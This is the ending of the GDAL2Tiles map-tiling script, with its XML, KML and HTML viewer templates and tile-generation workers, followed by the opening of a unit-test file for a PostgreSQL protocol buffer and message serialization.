array = numpy.zeros((querysize, querysize, tilebands),
numpy.uint8)
for i in range(tilebands):
array[:, :, i] = \
gdalarray.BandReadAsArray(dsquery.GetRasterBand(i
+ 1), 0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, self.tiledriver)
else:
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((
0.0,
tilesize / float(querysize),
0.0,
0.0,
0.0,
tilesize / float(querysize),
))
dstile.SetGeoTransform((
0.0,
1.0,
0.0,
0.0,
0.0,
1.0,
))
res = gdal.ReprojectImage(dsquery, dstile, None, None,
self.resampling)
if res != 0:
self.error('ReprojectImage() failed on %s, error %d'
% (tilefilename, res))
# -------------------------------------------------------------------------
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tilesize, tileformat, profile
"""
args = {}
args['title'] = self.options.title
(args['south'], args['west'], args['north'], args['east']) = \
self.swne
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = 'EPSG:900913'
elif self.options.profile == 'geodetic':
args['srs'] = 'EPSG:4326'
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ''
s = \
"""<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tilesize)d" height="%(tilesize)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" \
% args
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += \
""" <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" \
% (args['publishurl'], z, 2 ** (self.nativezoom
- z) * self.out_gt[1], z)
elif self.options.profile == 'mercator':
s += \
""" <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" \
% (args['publishurl'], z, 156543.0339 / 2 ** z, z)
elif self.options.profile == 'geodetic':
s += \
""" <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" \
% (args['publishurl'], z, 0.703125 / 2 ** z, z)
s += """ </TileSets>
</TileMap>
"""
return s
# -------------------------------------------------------------------------
def generate_kml(
self,
tx,
ty,
tz,
children=[],
**args
):
"""
Template for the KML. Returns filled string.
"""
(args['tx'], args['ty'], args['tz']) = (tx, ty, tz)
args['tileformat'] = self.tileext
if 'tilesize' not in args:
args['tilesize'] = self.tilesize
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tilesize'] / 2) # / 2.56) # default 128
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tilesize'] * 8) # 1.7) # default 2048 (used to be -1)
if children == []:
args['maxlodpixels'] = -1
if tx == None:
tilekml = False
args['title'] = self.options.title
else:
tilekml = True
args['title'] = '%d/%d/%d.kml' % (tz, tx, ty)
(args['south'], args['west'], args['north'], args['east'
]) = self.tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx != None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = self.options.url
if not url:
if tilekml:
url = '../../'
else:
url = ''
s = \
"""<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" \
% args
if tilekml:
s += \
"""
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" \
% args
for (cx, cy, cz) in children:
(csouth, cwest, cnorth, ceast) = self.tileswne(cx, cy, cz)
s += \
"""
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" \
% (
cz,
cx,
cy,
args['tileformat'],
cnorth,
csouth,
ceast,
cwest,
args['minlodpixels'],
url,
cz,
cx,
cy,
)
s += """ </Document>
</kml>
"""
return s
# -------------------------------------------------------------------------
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
(args['south'], args['west'], args['north'], args['east']) = \
self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = \
"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" \
% args
if self.kml:
s += \
"""
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += \
"""
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += \
"""
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" \
% args
s += \
"""
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.maptiler.org/">MapTiler</a>/<a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" \
% args
return s
# -------------------------------------------------------------------------
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
(args['south'], args['west'], args['north'], args['east']) = \
self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = '-1'
else:
args['tmsoffset'] = ''
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz + 1
args['rastermaxresolution'] = 2 ** self.nativezoom \
* self.out_gt[1]
s = \
"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" \
% args
if self.options.profile == 'mercator':
s += \
"""
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>""" \
% args
s += \
"""
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" \
% args
if self.options.profile == 'mercator':
s += \
"""
var options = {
div: "map",
controls: [],
projection: "EPSG:900913",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS( "TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent( mapBounds.transform(map.displayProjection, map.projection ) );
""" \
% args
elif self.options.profile == 'geodetic':
s += \
"""
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS( "TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent( mapBounds );
""" \
% args
elif self.options.profile == 'raster':
s += \
"""
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s ),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS( "TMS Layer","",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent( mapBounds );
""" \
% args
s += \
"""
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" \
% args
if self.options.profile == 'mercator':
s += \
"""
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" \
% args
elif self.options.profile == 'geodetic':
s += \
"""
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" \
% args
elif self.options.profile == 'raster':
s += \
"""
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" \
% args
s += \
"""
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.maptiler.org/">MapTiler</a>/<a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" \
% args
return s
# =============================================================================
# =============================================================================
# =============================================================================
def worker_metadata(argv):
gdal2tiles = GDAL2Tiles(argv[1:])
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
def worker_base_tiles(argv, cpu):
gdal2tiles = GDAL2Tiles(argv[1:])
gdal2tiles.open_input()
gdal2tiles.generate_base_tiles(cpu)
def worker_overview_tiles(argv, cpu, tz):
gdal2tiles = GDAL2Tiles(argv[1:])
gdal2tiles.open_input()
gdal2tiles.generate_overview_tiles(cpu, tz)
if __name__ == '__main__':
argv = gdal.GeneralCmdLineProcessor(sys.argv)
if argv:
gdal2tiles = GDAL2Tiles(argv[1:]) # handle command line options
p = multiprocessing.Process(target=worker_metadata, args=[argv])
p.start()
p.join()
pool = multiprocessing.Pool()
processed_tiles = 0
print 'Generating Base Tiles:'
for cpu in range(gdal2tiles.options.processes):
pool.apply_async(worker_base_tiles, [argv, cpu])
pool.close()
while len(multiprocessing.active_children()) != 0:
try:
total = queue.get(timeout=1)
processed_tiles += 1
gdal.TermProgress_nocb(processed_tiles / float(total))
sys.stdout.flush()
except:
pass
pool.join()
processed_tiles = 0
print 'Generating Overview Tiles:'
for tz in range(gdal2tiles.tmaxz - 1, gdal2tiles.tminz - 1, -1):
pool = multiprocessing.Pool()
for cpu in range(gdal2tiles.options.processes):
pool.apply_async(worker_overview_tiles, [argv, cpu, tz])
pool.close()
while len(multiprocessing.active_children()) != 0:
try:
total = queue.get(timeout=1)
processed_tiles += 1
gdal.TermProgress_nocb(processed_tiles
/ float(total))
sys.stdout.flush()
except:
pass
pool.join()
#############
# vim:noet
#############
|
test_protocol.py | ##
# .test.test_protocol
##
import sys
import unittest
import struct
import decimal
import socket
import time
from threading import Thread
from ..protocol import element3 as e3
from ..protocol import xact3 as x3
from ..protocol import client3 as c3
from ..protocol import buffer as pq_buf
from ..python.socket import find_available_port, SocketFactory
def pair(msg):
return (msg.type, msg.serialize())
def pairs(*msgseq):
return list(map(pair, msgseq))
long = struct.Struct("!L")
packl = long.pack
unpackl = long.unpack
class test_buffer(unittest.TestCase):
def setUp(self):
self.buffer = pq_buf.pq_message_stream()
def testMultiByteMessage(self):
b = self.buffer
b.write(b's')
self.assertTrue(b.next_message() is None)
b.write(b'\x00\x00')
self.assertTrue(b.next_message() is None)
b.write(b'\x00\x10')
self.assertTrue(b.next_message() is None)
data = b'twelve_chars'
b.write(data)
self.assertEqual(b.next_message(), (b's', data))
def testSingleByteMessage(self):
b = self.buffer
b.write(b's')
self.assertTrue(b.next_message() is None)
b.write(b'\x00')
self.assertTrue(b.next_message() is None)
b.write(b'\x00\x00\x05')
self.assertTrue(b.next_message() is None)
b.write(b'b')
self.assertEqual(b.next_message(), (b's', b'b'))
def testEmptyMessage(self):
b = self.buffer
b.write(b'x')
self.assertTrue(b.next_message() is None)
b.write(b'\x00\x00\x00')
self.assertTrue(b.next_message() is None)
b.write(b'\x04')
self.assertEqual(b.next_message(), (b'x', b''))
def testInvalidLength(self):
b = self.buffer
b.write(b'y\x00\x00\x00\x03')
self.assertRaises(ValueError, b.next_message,)
def testRemainder(self):
b = self.buffer
b.write(b'r\x00\x00\x00\x05Aremainder')
self.assertEqual(b.next_message(), (b'r', b'A'))
def testLarge(self):
b = self.buffer
factor = 1024
r = 10000
b.write(b'X' + packl(factor * r + 4))
segment = b'\x00' * factor
for x in range(r-1):
b.write(segment)
b.write(segment)
msg = b.next_message()
self.assertTrue(msg is not None)
self.assertEqual(msg[0], b'X')
def test_getvalue(self):
# Make sure that getvalue() only applies to messages
# that have not been read.
b = self.buffer
# It should be empty.
self.assertEqual(b.getvalue(), b'')
d = b'F' + packl(28)
b.write(d)
self.assertEqual(b.getvalue(), d)
d1 = b'01'*12 # 24
b.write(d1)
self.assertEqual(b.getvalue(), d + d1)
out = b.read()[0]
self.assertEqual(out, (b'F', d1))
nd = b'N'
b.write(nd)
self.assertEqual(b.getvalue(), nd)
b.write(packl(4))
self.assertEqual(list(b.read()), [(b'N', b'')])
self.assertEqual(b.getvalue(), b'')
# partial; read one message to exercise
# that the appropriate fragment of the first
# chunk in the buffer is picked up.
first_body = (b'1234' * 3)
first = b'v' + packl(len(first_body) + 4) + first_body
second_body = (b'4321' * 5)
second = b'z' + packl(len(second_body) + 4) + second_body
b.write(first + second)
self.assertEqual(b.getvalue(), first + second)
self.assertEqual(list(b.read(1)), [(b'v', first_body)])
self.assertEqual(b.getvalue(), second)
self.assertEqual(list(b.read(1)), [(b'z', second_body)])
# now, with a third full message in the next chunk
third_body = (b'9876' * 10)
third = b'3' + packl(len(third_body) + 4) + third_body
b.write(first + second)
b.write(third)
self.assertEqual(b.getvalue(), first + second + third)
self.assertEqual(list(b.read(1)), [(b'v', first_body)])
self.assertEqual(b.getvalue(), second + third)
self.assertEqual(list(b.read(1)), [(b'z', second_body)])
self.assertEqual(b.getvalue(), third)
self.assertEqual(list(b.read(1)), [(b'3', third_body)])
self.assertEqual(b.getvalue(), b'')
##
# element3 tests
##
message_samples = [
e3.VoidMessage,
e3.Startup([
(b'user', b'jwp'),
(b'database', b'template1'),
(b'options', b'-f'),
]),
e3.Notice((
(b'S', b'FATAL'),
(b'M', b'a descriptive message'),
(b'C', b'FIVEC'),
(b'D', b'bleh'),
(b'H', b'dont spit into the fan'),
)),
e3.Notify(123, b'wood_table'),
e3.KillInformation(19320, 589483),
e3.ShowOption(b'foo', b'bar'),
e3.Authentication(4, b'salt'),
e3.Complete(b'SELECT'),
e3.Ready(b'I'),
e3.CancelRequest(4123, 14252),
e3.NegotiateSSL(),
e3.Password(b'ckr4t'),
e3.AttributeTypes(()),
e3.AttributeTypes(
(123,) * 1
),
e3.AttributeTypes(
(123,0) * 1
),
e3.AttributeTypes(
(123,0) * 2
),
e3.AttributeTypes(
(123,0) * 4
),
e3.TupleDescriptor(()),
e3.TupleDescriptor((
(b'name', 123, 1, 1, 0, 0, 1,),
)),
e3.TupleDescriptor((
(b'name', 123, 1, 2, 0, 0, 1,),
) * 2),
e3.TupleDescriptor((
(b'name', 123, 1, 2, 1, 0, 1,),
) * 3),
